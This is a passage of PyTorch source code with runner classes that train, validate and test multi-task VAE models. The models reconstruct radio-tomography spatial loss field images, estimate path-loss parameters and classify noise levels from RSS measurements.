                         torch.from_numpy(rss_clean[sel]).float(),
                         torch.from_numpy(slf[sel]).float(),
                         torch.from_numpy(ab[sel]).float(),
                         torch.from_numpy(noise[sel]).long())
def train(self, model, train_loader, optimizer, epoch):
"""Run one MLVAE training epoch and return per-sample averaged metrics.

Returns (train_loss, train_kld, train_loss_task0, train_loss_task1,
train_loss_task2, train_loss_task3, train_acc), each divided by the
number of training samples.
"""
model.train()
train_loss = 0 # total loss
train_kld = 0 # kl-divergence
train_loss_task0 = 0 # loss for reconstruct RSS
train_loss_task1 = 0 # loss for SLF image estimation
train_loss_task2 = 0 # loss for parameters estimation
train_loss_task3 = 0 # loss for noise level prediction
train_acc = 0 # accuracy for noise level prediction
# batch_10num is the 10-epoch horizon for the KL warm-up weight below.
# NOTE(review): int(len/bs) + 1 over-counts by one when the dataset size
# divides batch_size exactly — only flattens the warm-up slope slightly.
batch_num = int(len(train_loader.dataset) / self.args.batch_size) + 1
batch_10num = batch_num * 10
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(train_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
optimizer.zero_grad()
KLD, RSS, SLF, ab, noise_level = model(input_RSS)
# Per-task losses, each normalised by its output dimensionality.
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
# KL warm-up: linear ramp across the first 10 epochs of each 20-epoch
# cycle, capped at lambda0.
loss_weight0 = (((epoch - 1) % 20) * batch_num + batch_idx) / batch_10num
loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
loss = loss_weight0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
train_loss += loss.item()
train_kld += KLD.item()
train_loss_task0 += loss_task0.item()
train_loss_task1 += loss_task1.item()
train_loss_task2 += loss_task2.item()
train_loss_task3 += loss_task3.item()
# Noise-level accuracy from the argmax of the class logits.
_, noise_pred = torch.max(noise_level, 1)
acc_task3 = (noise_pred == target_noise_level).sum()
train_acc += acc_task3.item()
# Average over the batch before backprop (sums were accumulated above).
loss /= input_RSS.size(0)
loss.backward()
optimizer.step()
if batch_idx % self.args.log_interval == 0:
print(
'Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\tKLD: {:.6f}\tLoss0: {:.6f}\tLoss1: {:.6f}\tLoss2: {:.6f}\tLoss3: {:.6f}\tAcc: {:.6f}'.format(
epoch, batch_idx * len(input_RSS), len(train_loader.dataset),
100. * batch_idx / len(train_loader),
loss.item(),
KLD.item() / len(input_RSS),
loss_task0.item() / len(input_RSS), loss_task1.item() / len(input_RSS),
loss_task2.item() / len(input_RSS), loss_task3.item() / len(input_RSS),
acc_task3.item() / len(input_RSS)))
# Normalise all accumulators to per-sample averages.
train_loss /= len(train_loader.dataset)
train_kld /= len(train_loader.dataset)
train_loss_task0 /= len(train_loader.dataset)
train_loss_task1 /= len(train_loader.dataset)
train_loss_task2 /= len(train_loader.dataset)
train_loss_task3 /= len(train_loader.dataset)
train_acc /= len(train_loader.dataset)
print('====> Epoch: {} Average loss: {:.6f}'.format(epoch, train_loss))
print('====> KL divergence: {:.6f}'.format(train_kld))
print('====> RSS loss: {:.6f}'.format(train_loss_task0))
print('====> SLF loss: {:.6f}'.format(train_loss_task1))
print('====> ab loss: {:.6f}'.format(train_loss_task2))
print('====> noise level loss: {:.6f}'.format(train_loss_task3))
print('====> noise level Accuracy: {:.4f}'.format(train_acc))
return train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc
def validate(self, model, val_loader, epoch):
    """Run one validation pass and report loss plus SLF reconstruction quality.

    The KL term is excluded from the validation loss (the original code
    multiplied it by zero); the dead warm-up-weight computation was removed,
    so *epoch* is unused but kept for a signature symmetric with
    train()/test().

    Returns (val_loss, val_rmse_slf, val_mae_slf): the weighted multi-task
    loss, the per-pixel SLF RMSE and the per-pixel SLF MAE, each averaged
    over the full validation set.
    """
    model.eval()
    val_loss = 0        # accumulated weighted multi-task loss
    val_rmse_slf = 0    # accumulated per-pixel SLF squared error
    val_mae_slf = 0     # accumulated per-pixel SLF absolute error
    # Fix: inference only — disable autograd to save memory/time.
    with torch.no_grad():
        for input_RSS, target_RSS, target_SLF, target_ab, target_noise_level in val_loader:
            input_RSS = input_RSS.to(self.device)
            target_RSS = target_RSS.to(self.device)
            target_SLF = target_SLF.to(self.device)
            target_ab = target_ab.to(self.device)
            target_noise_level = target_noise_level.to(self.device)
            KLD, RSS, SLF, ab, noise_level = model(input_RSS)
            # Per-task losses, each normalised by its output dimensionality.
            loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
                self.args.N * self.args.P * self.args.P)
            loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
            loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
            loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
            loss = self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
                + self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
            val_loss += loss.item()
            val_rmse_slf += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
            val_mae_slf += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
    val_loss /= len(val_loader.dataset)
    # RMSE = sqrt of the mean per-pixel squared error over the whole set.
    val_rmse_slf = np.sqrt(val_rmse_slf / len(val_loader.dataset))
    val_mae_slf /= len(val_loader.dataset)
    print('====> Validation set loss: {:.6f}'.format(val_loss))
    print('====> Validation set SLF rmse: {:.6f}'.format(val_rmse_slf))
    print('====> Validation set SLF mae: {:.6f}'.format(val_mae_slf))
    return val_loss, val_rmse_slf, val_mae_slf
def test(self, model, test_loader, epoch):
"""Evaluate the model on *test_loader* under torch.no_grad().

Returns (test_loss, test_kld, test_loss_task0..3, test_acc), each
averaged over the number of test samples.
"""
model.eval()
test_loss = 0 # total loss
test_kld = 0 # KL-divergence
test_loss_task0 = 0 # loss for reconstruct RSS
test_loss_task1 = 0 # loss for SLF image estimation
test_loss_task2 = 0 # loss for parameters estimation
test_loss_task3 = 0 # loss for noise level prediction
# Same KL warm-up bookkeeping as train(); see the NOTE below.
batch_num = int(len(test_loader.dataset) / self.args.batch_size) + 1
batch_10num = batch_num * 10
with torch.no_grad():
for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
target_RSS = target_RSS.to(self.device)
target_SLF = target_SLF.to(self.device)
target_ab = target_ab.to(self.device)
target_noise_level = target_noise_level.to(self.device)
KLD, RSS, SLF, ab, noise_level = model(input_RSS)
# Per-task losses, each normalised by its output dimensionality.
loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum') / (
self.args.N * self.args.P * self.args.P)
loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum') / (self.args.K0 * self.args.K1)
loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum') / (self.args.N + 1)
loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
# NOTE(review): the epoch-dependent KL weight mirrors the training
# warm-up, so the reported test loss varies with epoch even for a
# frozen model — presumably intentional for comparability; confirm.
loss_weight0 = (((epoch - 1) % 20) * batch_num + batch_idx) / batch_10num
loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
loss = loss_weight0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1 \
+ self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
test_loss += loss.item()
test_kld += KLD.item()
test_loss_task0 += loss_task0.item()
test_loss_task1 += loss_task1.item()
test_loss_task2 += loss_task2.item()
test_loss_task3 += loss_task3.item()
# Normalise all accumulators to per-sample averages.
test_loss /= len(test_loader.dataset)
test_kld /= len(test_loader.dataset)
test_loss_task0 /= len(test_loader.dataset)
test_loss_task1 /= len(test_loader.dataset)
test_loss_task2 /= len(test_loader.dataset)
test_loss_task3 /= len(test_loader.dataset)
# Noise-level classification accuracy via a second pass over the loader.
test_acc = self.test_accuracy(model, test_loader)
print('====> Test set loss: {:.6f}'.format(test_loss))
print('====> Test set KL divergence: {:.6f}'.format(test_kld))
print('====> Test set RSS loss: {:.6f}'.format(test_loss_task0))
print('====> Test set SLF loss: {:.6f}'.format(test_loss_task1))
print('====> Test set ab loss: {:.6f}'.format(test_loss_task2))
print('====> Test set noise level loss: {:.6f}'.format(test_loss_task3))
print('====> Test set noise level Accuracy: {:.4f}'.format(test_acc))
return test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc
def train_save(self):
"""Train the MLVAE model end-to-end, checkpoint it, and persist per-epoch
loss curves for the train/val/test splits and the two held-out test images."""
model = MLVAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
# Xavier-initialise every linear / (transposed) conv layer; zero biases.
def weights_init(m):
if isinstance(m, torch.nn.Linear) or isinstance(m, torch.nn.Conv2d) or isinstance(m,
torch.nn.ConvTranspose2d):
torch.nn.init.xavier_uniform_(m.weight.data)
if m.bias is not None:
torch.nn.init.zeros_(m.bias.data)
model.apply(weights_init)
model = model.to(self.device)
summary(model, input_size=(self.args.batch_size, self.args.N, self.args.P, self.args.P))
train_loader, val_loader, test_loader, test_loader1, test_loader2 = self.load_data()
optimizer = self.get_optimizer(model.parameters())
# Quarter the LR whenever validation loss plateaus for 10 epochs (floor 1e-5).
scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min', factor=0.25, patience=10, min_lr=1e-5)
# Per-epoch metric histories, written to disk after training.
train_set = []
val_set = []
test_set = [] # for test set
test_set1 = [] # for test image 1
test_set2 = [] # for test image 2
train_loss_path = self.path + 'train_loss_' + str(self.args.n_epochs) + '.npy'
val_loss_path = self.path + 'val_loss_' + str(self.args.n_epochs) + '.npy'
test_loss_path = self.path + 'test_loss_' + str(self.args.n_epochs) + '.npz'
model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
# Best-model tracking keyed on validation SLF MAE (lower is better).
current_val_slf_loss = np.inf
for epoch in range(1, self.args.n_epochs + 1):
print("Epoch %d learning rate:%f" % (epoch, optimizer.param_groups[0]['lr']))
train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3, train_acc = self.train(
model,
train_loader,
optimizer,
epoch)
train_set.append(
[train_loss, train_kld, train_loss_task0, train_loss_task1, train_loss_task2, train_loss_task3,
train_acc])
print('====> Validation Loss for Epoch {:d}'.format(epoch))
val_loss, val_slf_rmse, val_slf_mae = self.validate(model, val_loader, epoch)
val_set.append([val_loss, val_slf_rmse, val_slf_mae])
# LR scheduler is driven by the total validation loss.
scheduler.step(val_loss)
print('====> Test for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(
model,
test_loader, epoch)
test_set.append(
[test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
print('====> Test Image1 for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(
model,
test_loader1, epoch)
test_set1.append(
[test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
print('====> Test Image2 for Epoch {:d}'.format(epoch))
test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc = self.test(
model,
test_loader2, epoch)
test_set2.append(
[test_loss, test_kld, test_loss_task0, test_loss_task1, test_loss_task2, test_loss_task3, test_acc])
# Periodic checkpoint every save_freq epochs.
if epoch % self.args.save_freq == 0:
# NOTE(review): self.path already ends with '/' (set in __init__), so
# this produces a double slash in the checkpoint name — harmless but
# inconsistent with model_path above; confirm before changing.
ckpt_path = self.path + '/model' + '_' + str(epoch) + '.pth'
torch.save(model.state_dict(), ckpt_path)
print('checkpoint{}.pth saved!'.format(epoch))
# Keep the weights with the lowest validation SLF MAE seen so far.
if val_slf_mae < current_val_slf_loss:
torch.save(model.state_dict(), model_path)
current_val_slf_loss = val_slf_mae
# Persist metric histories: 7 columns for train/test rows, 3 for val rows.
train_loss = np.asarray(train_set).reshape(-1, 7)
val_loss = np.asarray(val_set).reshape(-1, 3)
test_loss = np.asarray(test_set).reshape(-1, 7)
test_loss1 = np.asarray(test_set1).reshape(-1, 7)
test_loss2 = np.asarray(test_set2).reshape(-1, 7)
np.save(train_loss_path, train_loss)
np.save(val_loss_path, val_loss)
np.savez(test_loss_path, test_loss=test_loss, test_loss1=test_loss1, test_loss2=test_loss2)
def test_accuracy(self, model, test_loader):
model.eval()
acc = 0
for i, (input_RSS, *_, target_noise_level) in enumerate(test_loader):
input_RSS = input_RSS.to(self.device)
*_, noise_pred = model(input_RSS) # noise_pred: [batch_size, 3]
noise_pred = noise_pred.detach().cpu().numpy()
noise_pred = np.argmax(noise_pred, axis=1)
labels = target_noise_level.detach().cpu().numpy()
acc += np.sum((noise_pred == labels).astype(int))
acc /= len(test_loader.dataset)
return acc
def test_model(self, noise_level='all'):
    """Load the best saved MLVAE checkpoint and report its test metrics.

    Evaluates the model on the held-out testing set and on the two
    single-image test sets, printing SLF RMSE/MAE, ab RMSE and noise-level
    accuracy for each split, and saving SLF reconstruction grids as PNGs.

    Args:
        noise_level: 'all', 'low', 'mid' or 'high' — which noise subset of
            the test data to evaluate (forwarded to self.load_data).
    """
    model = MLVAE(M=self.args.M, P=self.args.P, K=(self.args.K0, self.args.K1))
    model = model.to(self.device)
    model_path = self.path + 'model_' + str(self.args.n_epochs) + '.pth'
    model.load_state_dict(torch.load(model_path, map_location=self.device))
    model.eval()
    *_, test_loader, test_loader1, test_loader2 = self.load_data(noise_level)
    noise_class = 0  # noise_class = 0 stands for all noise classes
    if noise_level == 'low':
        noise_class = 1
    elif noise_level == 'mid':
        noise_class = 2
    elif noise_level == 'high':
        noise_class = 3
    # The three evaluations only differ in the loader, the file-name tag and
    # the printed header, so they share one helper instead of three
    # copy-pasted loops.
    self._evaluate_split(model, test_loader, '', noise_class, noise_level,
                         '====> Test for Testing Set:')
    self._evaluate_split(model, test_loader1, '1', noise_class, noise_level,
                         '====> Test for image 1:')
    self._evaluate_split(model, test_loader2, '2', noise_class, noise_level,
                         '====> Test for image 2:')

def _evaluate_split(self, model, loader, img_tag, noise_class, noise_level, header):
    """Compute and print SLF RMSE/MAE, ab RMSE and noise accuracy for one loader.

    Args:
        model: trained MLVAE in eval mode; forward returns
            (KLD, RSS, SLF, ab, noise_pred).
        loader: DataLoader over (input_RSS, target_RSS, target_SLF,
            target_ab, target_noise_level) tuples.
        img_tag: '' / '1' / '2' — suffix in the reconstruction file name,
            matching the original 'reconstruction_SLF{tag}_noise...' names.
        noise_class: integer tag of the evaluated noise subset (0 = all).
        noise_level: human-readable noise level for the report.
        header: first line printed before the metric report.
    """
    slf_rmse = 0
    slf_mae = 0
    ab_rmse = 0
    with torch.no_grad():  # inference only: no autograd graph needed
        for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(loader):
            input_RSS = input_RSS.to(self.device)
            target_RSS = target_RSS.to(self.device)
            target_SLF = target_SLF.to(self.device)
            target_ab = target_ab.to(self.device)
            KLD, RSS, SLF, ab, noise_pred = model(input_RSS)
            # save a grid comparing target SLF (top rows) vs reconstruction
            n = min(target_RSS.size(0), 8)
            comparison = torch.cat([target_SLF.view(target_RSS.size(0), 1, self.args.K0, self.args.K1)[:n],
                                    SLF.view(SLF.size(0), 1, self.args.K0, self.args.K1)[:n]])
            save_image(comparison.cpu(),
                       self.path + 'reconstruction_SLF' + img_tag + '_noise' + str(noise_class) + '_' + str(batch_idx) + '.png',
                       nrow=n)
            # accumulate summed errors, normalized by per-sample feature size
            slf_rmse += F.mse_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
            slf_mae += F.l1_loss(SLF, target_SLF, reduction='sum').item() / (self.args.K0 * self.args.K1)
            ab_rmse += F.mse_loss(ab, target_ab, reduction='sum').item() / (self.args.N + 1)
    slf_rmse /= len(loader.dataset)
    slf_rmse = np.sqrt(slf_rmse)
    slf_mae /= len(loader.dataset)
    ab_rmse /= len(loader.dataset)
    ab_rmse = np.sqrt(ab_rmse)
    noise_acc = self.test_accuracy(model, loader)
    print(header)
    print('====> Noise_level: ' + noise_level)
    print('====> Test set SLF rmse: {:.6f}'.format(slf_rmse))
    print('====> Test set SLF mae: {:.6f}'.format(slf_mae))
    print('====> Test set ab rmse: {:.6f}'.format(ab_rmse))
    print('====> Test set noise level Accuracy: {:.4f}'.format(noise_acc))
# runner for Multi-task Gaussian Mixture VAE
class MGMVAE_runner():
def __init__(self, args):
    """Store the run arguments, pick the compute device, seed the RNGs and
    create the MGMVAE output directory under ``args.run``."""
    self.args = args
    use_cuda = torch.cuda.is_available() and not args.no_cuda
    self.device = torch.device("cuda" if use_cuda else "cpu")
    torch.manual_seed(args.seed)
    random.seed(args.seed)
    self.path = args.run + 'MGMVAE/'
    if not os.path.exists(self.path):
        os.makedirs(self.path)
def get_optimizer(self, parameters):
    """Instantiate the optimizer selected by ``self.args.optimizer``.

    Args:
        parameters: iterable of model parameters to optimize.

    Returns:
        A configured Adam, RMSprop or SGD optimizer.

    Raises:
        NotImplementedError: if ``self.args.optimizer`` is not one of
            'Adam', 'RMSProp' or 'SGD'.
    """
    choice = self.args.optimizer
    if choice == 'Adam':
        return optim.Adam(parameters, lr=self.args.lr,
                          weight_decay=self.args.weight_decay,
                          betas=(0.9, 0.999), eps=1e-7)
    if choice == 'RMSProp':
        return optim.RMSprop(parameters, lr=self.args.lr,
                             weight_decay=self.args.weight_decay)
    if choice == 'SGD':
        return optim.SGD(parameters, lr=self.args.lr, momentum=0.9)
    raise NotImplementedError('Optimizer {} not understood.'.format(choice))
def load_data(self, noise_level='all'):
    """Build DataLoaders for training, validation and the three test sets.

    Args:
        noise_level: 'all', 'low', 'mid' or 'high'; forwarded to the
            test-set loaders to select a noise subset.

    Returns:
        (train_loader, val_loader, test_loader, test_loader1, test_loader2)
    """
    dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min = self.load_training_data()
    # 90/10 split. Derive the validation size from the remainder so the two
    # sizes always sum to len(dataset): the original int(len*0.9)+int(len*0.1)
    # can truncate a sample away (e.g. len=15 -> 13+1=14) and make
    # random_split raise a ValueError.
    train_size = int(len(dataset) * 0.9)
    val_size = len(dataset) - train_size
    dataset_train, dataset_val = random_split(dataset, [train_size, val_size],
                                              generator=torch.Generator().manual_seed(self.args.seed))
    dataset_test = self.load_testing_data(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
    dataset_test1 = self.load_testing_img1(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
    dataset_test2 = self.load_testing_img2(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
    train_loader = DataLoader(
        dataset_train,
        batch_size=self.args.batch_size, shuffle=True, num_workers=2)
    val_loader = DataLoader(
        dataset_val,
        batch_size=self.args.batch_size, shuffle=True, num_workers=2)
    test_loader = DataLoader(
        dataset_test,
        batch_size=self.args.batch_size, shuffle=False, num_workers=2)
    test_loader1 = DataLoader(
        dataset_test1,
        batch_size=self.args.batch_size, shuffle=False, num_workers=2)
    test_loader2 = DataLoader(
        dataset_test2,
        batch_size=self.args.batch_size, shuffle=False, num_workers=2)
    print("Data Loaded!")
    return train_loader, val_loader, test_loader, test_loader1, test_loader2
def load_training_data(self):
    """Load ./data/training_data.mat and build the training TensorDataset.

    Returns:
        (dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min) where
        the min/max arrays are the per-feature normalization statistics the
        test loaders must reuse.
    """
    raw = sio.loadmat('./data/training_data.mat')
    N, P = self.args.N, self.args.P
    # noisy RSS measurement input, min-max normalized per feature
    # (shape: [num_sample, NxPxP] -> [num_sample, N, P, P])
    noisy = raw['RSS']
    RSS_max = np.amax(noisy, axis=0, keepdims=True)
    RSS_min = np.amin(noisy, axis=0, keepdims=True)
    noisy = ((noisy - RSS_min) / (RSS_max - RSS_min)).reshape(-1, N, P, P)
    # clean RSS measurement (decoder target), min-max normalized per feature
    clean = raw['RSS_denoise']
    RSS_denoise_max = np.amax(clean, axis=0, keepdims=True)
    RSS_denoise_min = np.amin(clean, axis=0, keepdims=True)
    clean = ((clean - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)).reshape(-1, N, P, P)
    # SLF image (shape: [num_sample, K0*K1])
    slf = raw['slf_img'].reshape(-1, self.args.K0 * self.args.K1)
    # ab_norm: [b_norm, alpha_norm] (b: bias, alpha: path loss exponent)
    ab = raw['ab_norm']
    # noise level classes (classes: 0, 1, 2), squeezed to 1-D
    noise = np.squeeze(raw['sig_epsilon_class'])
    train_dataset = TensorDataset(torch.from_numpy(noisy).float(),
                                  torch.from_numpy(clean).float(),
                                  torch.from_numpy(slf).float(),
                                  torch.from_numpy(ab).float(),
                                  torch.from_numpy(noise).long())
    return train_dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min
def load_testing_data(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
    """Load ./data/testing_data.mat filtered to the requested noise subset.

    Args:
        RSS_max, RSS_min: training-set normalization stats for noisy RSS.
        RSS_denoise_max, RSS_denoise_min: stats for the clean RSS target.
        noise_level: 'all', 'low' (class 0), 'mid' (class 1) or 'high'
            (class 2).

    Returns:
        TensorDataset of (input_RSS, denoise_RSS, slf_img, ab, noise_class).

    Raises:
        NotImplementedError: for an unknown noise_level.
    """
    raw = sio.loadmat('./data/testing_data.mat')
    # noise level classes (classes: 0, 1, 2), squeezed to 1-D
    noise = np.squeeze(raw['sig_epsilon_class'])
    if noise_level == 'all':
        idx = (noise == 0) | (noise == 1) | (noise == 2)
    elif noise_level == 'low':
        idx = (noise == 0)
    elif noise_level == 'mid':
        idx = (noise == 1)
    elif noise_level == 'high':
        idx = (noise == 2)
    else:
        raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
    noise = noise[idx]
    N, P = self.args.N, self.args.P
    # normalize with the TRAINING statistics, then reshape to [n, N, P, P]
    noisy = ((raw['RSS'][idx] - RSS_min) / (RSS_max - RSS_min)).reshape(-1, N, P, P)
    clean = ((raw['RSS_denoise'][idx] - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)).reshape(-1, N, P, P)
    slf = raw['slf_img'][idx].reshape(-1, self.args.K0 * self.args.K1)
    ab = raw['ab_norm'][idx]
    return TensorDataset(torch.from_numpy(noisy).float(),
                         torch.from_numpy(clean).float(),
                         torch.from_numpy(slf).float(),
                         torch.from_numpy(ab).float(),
                         torch.from_numpy(noise).long())
def load_testing_img1(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
    """Load ./data/testing_data_image1.mat for the requested noise subset.

    The file stores one SLF image shared by all samples; the samples are
    ordered by noise level in blocks ([:500] low, [500:1000] mid, [1000:]
    high — mirrors the original slicing).

    Args:
        RSS_max, RSS_min: training-set normalization stats for noisy RSS.
        RSS_denoise_max, RSS_denoise_min: stats for the clean RSS target.
        noise_level: 'all', 'low', 'mid' or 'high'.

    Returns:
        TensorDataset of (input_RSS, denoise_RSS, slf_img, ab, noise_level).

    Raises:
        NotImplementedError: for an unknown noise_level.
    """
    raw = sio.loadmat('./data/testing_data_image1.mat')
    N, P = self.args.N, self.args.P
    # normalize with the TRAINING statistics, then reshape to [n, N, P, P]
    noisy = ((raw['RSS'] - RSS_min) / (RSS_max - RSS_min)).reshape(-1, N, P, P)
    clean = ((raw['RSS_denoise'] - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)).reshape(-1, N, P, P)
    # single SLF image replicated for every sample
    slf = raw['slf_img'].reshape(1, self.args.K0 * self.args.K1)
    slf = np.tile(slf, (noisy.shape[0], 1))
    ab = raw['ab_norm']
    noise = np.squeeze(raw['sig_epsilon_class'])
    if noise_level == 'all':
        sel = slice(None)
    elif noise_level == 'low':
        sel = slice(None, 500)
    elif noise_level == 'mid':
        sel = slice(500, 1000)
    elif noise_level == 'high':
        sel = slice(1000, None)
    else:
        raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
    return TensorDataset(torch.from_numpy(noisy[sel]).float(),
                         torch.from_numpy(clean[sel]).float(),
                         torch.from_numpy(slf[sel]).float(),
                         torch.from_numpy(ab[sel]).float(),
                         torch.from_numpy(noise[sel]).long())
def load_testing_img2(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
    """Load ./data/testing_data_image2.mat for the requested noise subset.

    Same layout as image 1: one shared SLF image, samples grouped by noise
    level ([:500] low, [500:1000] mid, [1000:] high — mirrors the original
    slicing). NOTE: this file stores the clean RSS under the key
    'RSS_denoise_norm' (unlike image 1's 'RSS_denoise').

    Args:
        RSS_max, RSS_min: training-set normalization stats for noisy RSS.
        RSS_denoise_max, RSS_denoise_min: stats for the clean RSS target.
        noise_level: 'all', 'low', 'mid' or 'high'.

    Returns:
        TensorDataset of (input_RSS, denoise_RSS, slf_img, ab, noise_level).

    Raises:
        NotImplementedError: for an unknown noise_level.
    """
    raw = sio.loadmat('./data/testing_data_image2.mat')
    N, P = self.args.N, self.args.P
    # normalize with the TRAINING statistics, then reshape to [n, N, P, P]
    noisy = ((raw['RSS'] - RSS_min) / (RSS_max - RSS_min)).reshape(-1, N, P, P)
    clean = ((raw['RSS_denoise_norm'] - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)).reshape(-1, N, P, P)
    # single SLF image replicated for every sample
    slf = raw['slf_img'].reshape(1, self.args.K0 * self.args.K1)
    slf = np.tile(slf, (noisy.shape[0], 1))
    ab = raw['ab_norm']
    noise = np.squeeze(raw['sig_epsilon_class'])
    if noise_level == 'all':
        sel = slice(None)
    elif noise_level == 'low':
        sel = slice(None, 500)
    elif noise_level == 'mid':
        sel = slice(500, 1000)
    elif noise_level == 'high':
        sel = slice(1000, None)
    else:
        raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
    return TensorDataset(torch.from_numpy(noisy[sel]).float(),
                         torch.from_numpy(clean[sel]).float(),
                         torch.from_numpy(slf[sel]).float(),
                         torch.from_numpy(ab[sel]).float(),
                         torch.from_numpy(noise[sel]).long())
def train(self, model, train_loader, optimizer, epoch):
    """Run one training epoch of the MGMVAE and return averaged metrics.

    Optimizes a weighted multi-task loss: KL divergence (with a warm-up
    weight), RSS reconstruction, SLF image estimation, ab parameter
    estimation and noise-level classification.

    Args:
        model: MGMVAE network; forward returns
            (KLD, RSS, SLF, ab, noise_level_logits, kl_w, kl_h, kl_c).
        train_loader: DataLoader yielding
            (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level).
        optimizer: optimizer over model.parameters().
        epoch: 1-based epoch index; drives the KLD warm-up schedule.

    Returns:
        10-tuple of per-sample averages: (loss, kld, loss_task0, loss_task1,
        loss_task2, loss_task3, acc, kl_w, kl_h, kl_c).
    """
    model.train()
    train_loss = 0  # total loss
    train_kld = 0  # total kl-divergence
    train_loss_task0 = 0  # loss for reconstruct RSS
    train_loss_task1 = 0  # loss for SLF image estimation
    train_loss_task2 = 0  # loss for parameters estimation
    train_loss_task3 = 0  # loss for noise level prediction
    train_acc = 0  # accuracy for noise level prediction
    train_kl_loss_w = 0  # kl-divergence for w
    train_kl_loss_h = 0  # kl-divergence for h
    train_kl_loss_c = 0  # kl-divergence for c
    batch_num = int(len(train_loader.dataset) / self.args.batch_size) + 1
    batch_10num = batch_num * 10  # warm-up horizon: 10 epochs' worth of batches
    for batch_idx, (input_RSS, target_RSS, target_SLF, target_ab, target_noise_level) in enumerate(train_loader):
        input_RSS = input_RSS.to(self.device)
        target_RSS = target_RSS.to(self.device)
        target_SLF = target_SLF.to(self.device)
        target_ab = target_ab.to(self.device)
        target_noise_level = target_noise_level.to(self.device)
        optimizer.zero_grad()
        KLD, RSS, SLF, ab, noise_level, kl_loss_w, kl_loss_h, kl_loss_c = model(input_RSS)
        # per-task losses: summed over the batch, normalized by feature size
        loss_task0 = F.binary_cross_entropy(RSS, target_RSS, reduction='sum')/(self.args.N * self.args.P * self.args.P)
        loss_task1 = F.binary_cross_entropy(SLF, target_SLF, reduction='sum')/(self.args.K0 * self.args.K1)
        loss_task2 = F.binary_cross_entropy(ab, target_ab, reduction='sum')/(self.args.N + 1)
        loss_task3 = F.cross_entropy(noise_level, target_noise_level, reduction='sum')
        # KLD weight warms up linearly over batches (restarting every 20
        # epochs) and is capped at lambda0
        loss_weight0 = (((epoch-1) % 20) * batch_num + batch_idx) / batch_10num
        loss_weight0 = np.minimum(loss_weight0, self.args.lambda0)
        loss = loss_weight0 * KLD + self.args.lambda1 * loss_task0 + self.args.lambda2 * loss_task1\
            + self.args.lambda3 * loss_task2 + self.args.lambda4 * loss_task3
        # accumulate the batch SUMS; per-sample averages are taken after the loop
        train_loss += loss.item()
        train_kld += KLD.item()
        train_kl_loss_w += kl_loss_w.item()
        train_kl_loss_h += kl_loss_h.item()
